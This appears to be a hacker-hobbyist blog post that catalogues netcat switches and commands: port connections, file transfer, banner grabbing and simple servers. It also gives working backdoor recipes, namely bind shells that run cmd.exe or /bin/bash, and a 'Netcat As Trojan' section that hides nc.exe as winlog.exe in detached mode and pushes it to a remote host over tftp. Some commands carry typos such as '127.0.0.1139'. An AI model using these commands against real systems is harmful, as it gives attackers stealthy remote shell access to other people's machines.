Hello GreenHackers...
In This Article We'll Discuss about NETCAT Commands & Use. For Those People Who Don't Know About NETCAT Must Read My Previous Post NETCAT | BEGINNER GUIDE ..
Okay So Let's Start..
Important Switches
- -d detach from console, stealth mode
- -e prog inbound program to exec [dangerous!!]
- -g source-routing hop point[s], up to 8
- -G num source-routing pointer: 4, 8, 12, ...
- -i secs delay interval for lines sent, ports scanned
- -l listen mode, for inbound connects
- -L listen harder, re-listen on socket close
- -n numeric-only IP addresses, no DNS
- -o file hex dump of traffic
- -p port local port number
- -r randomize local and remote ports
- -s addr local source address
- -t answer TELNET negotiation
- -u UDP mode
- -v verbose [use twice to be more verbose]
- -w secs timeout for connects and final net reads
- -z zero-I/O mode [used for scanning]
Netcat Connecting
Run nc in connect
mode and connect
to port 139
nc -p 31337 127.0.0.1139
Run nc in connect
mode and connect
to port 139 and give verbose
display -v -v two times make more
verbose
nc -v -v -p 31337 127.0.0.1 139
Run nc in connect
mode and connect
to port 139 with TIMEOUT set to 5
nc -w 5 -p 31337 127.0.0.1 139
Run nc in connect
mode and connect
to port 139 with TIMEOUT set to 5 and give verbose display
nc -v -v -w 5 -p 31337 127.0.0.1 139
Netcat Execute
-e Executes
a program if netcat is compiled
with the – DGAPING_SECURITY_HOLE.
Nc.exe is compiled to execute when -e is used.
Example
nc-l
-d -p 10000 -e cmd.exe or
nc-L
-d -p 10000 -e cmd.exe
This
will run nc in detached mode and
listen on port 10000.
Netcat Listen
Use –L switch
to reconnect to
the
same NetCat sessions.
This way you can connect over and over to the same
Netcat process.
Example:
nc
-l -p 53 -t -e cmd.exe
nc
-l -p 5050 | /bin/bash
nc -v -l -p 5050 -e '/bin/bash'
Netcat File Sending
To receive a file named newfile on the destination system start netcat with the following command:
nc –l –p 1234 >newfile
On the source system send a file named newfile to the destination system with the following
command:
nc destinationIP 1234 < newfile
Netcat Banner Grabbing
nc –vvn hostIP 80
nc –vvn hostIP 8080
Once connected type HEAD
/ HTTP/1.0 [Hit enter twice]
nc -v www.website.com 80 < get.txt
Checking WEB Header.
Your get.txt file will contain:
GET / HTTP/1.0
[Carriage] (JUST HIT ENTER IN YOUR TEXT EDITOR)
[Carriage]
In perl you can use print $socket
"GET / HTTP/1.0\n\n";
echo "blahblahblah" | nc hostIP 80 > default.htm
cat get.txt
| nc hostIP 80
Netcat Web Banner Grabber
First File is a text file:
----- begin
get.txt -----
GET
|
/ HTTP/1.0
|
||
HIT
|
ENTER IN YOUR
|
EDITOR
|
|
HIT
|
ENTER IN YOUR
|
EDITOR
|
----- end get.txt -----
The second file is a batch file:
----- begin
getweb.cmd -----
@echo off
nc
-v %1 80 < get.txt > index.txt
notepad
index.txt
----- end getweb.cmd -----
You run it like this: getweb.cmd www.someweb.com
Netcat Finger & Telnet
Netcat as a simple
finger client:
nc
-v hostIP 79 < user.txt
The file
“user.txt contains the username you
are interested in.
You can also
send the output to
a log
file.
nc
-v hostIP 79 < user.txt >
log.txt
Run nc in listen mode and answer Telnet negotiation in detached mode.
nc -v -v -L -d
127.0.0.1 -p 23
Netcat Simple Server
To create a simple
server
nc -l -p 1234 < file
A very simple web
server
nc -L -d -p 80 < file
A simple telnet server with
execution
nc -L -d -p 23 -t -e cmd.exe
Netcat As Trojan
We will use –t switch to
answer telnet negotiation. Netcat should be compiled
with –DTELNET parameter.
nc -l -d -t -p 10000 -e cmd.exe and/or
nc-L -d -t -p 10000 -e cmd.exe
winlog.exe -L -d -p 139 -t -e cmd.exe
(note winlog.exe= nc.exe)
Connect to your trojan using
nc -vvn IP_address_of_target port
nc -l -p 53 -t -e cmd.exe Netcat listening on port 53.
nc -l -p 23 -t -e cmd.exe Netcat listening on port 23.
To send netcat on a remote box using tftp
tftp –i remoteip GET nc.exe
This Is Just Some Commands of Netcat to show the power and Versatility of Netcat. I Found This article from the web Written By Adonis a.K.a. NtWaK0..
Enjoy Friends With NETCAT.... @@@@@@@